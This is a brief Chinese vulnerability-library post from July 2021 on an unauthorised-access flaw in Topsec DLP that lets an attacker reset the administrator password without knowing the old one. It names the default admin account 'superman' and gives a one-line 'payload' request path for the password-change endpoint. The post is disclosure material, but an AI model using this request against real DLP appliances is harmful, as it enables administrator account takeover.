天融信DLP_未授權&越權漏洞棉花糖2021年7月15日发布关注私信070 # 天融信DLP 未授權&越權漏洞 ==漏洞原理== 管理員登錄系統系統之後修改密碼,未採用原密碼校驗,且存在未授權訪問導致存在越權修改管理員密碼。 ==默認用戶== superman --- uid=1 ==Payload== POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1 © 版权声明文章版权归作者所有,未经允许请勿转载。THE END漏洞库 喜欢就支持一下吧点赞0赞赏 分享QQ空间微博QQ好友海报分享复制链接收藏
请登录后查看评论内容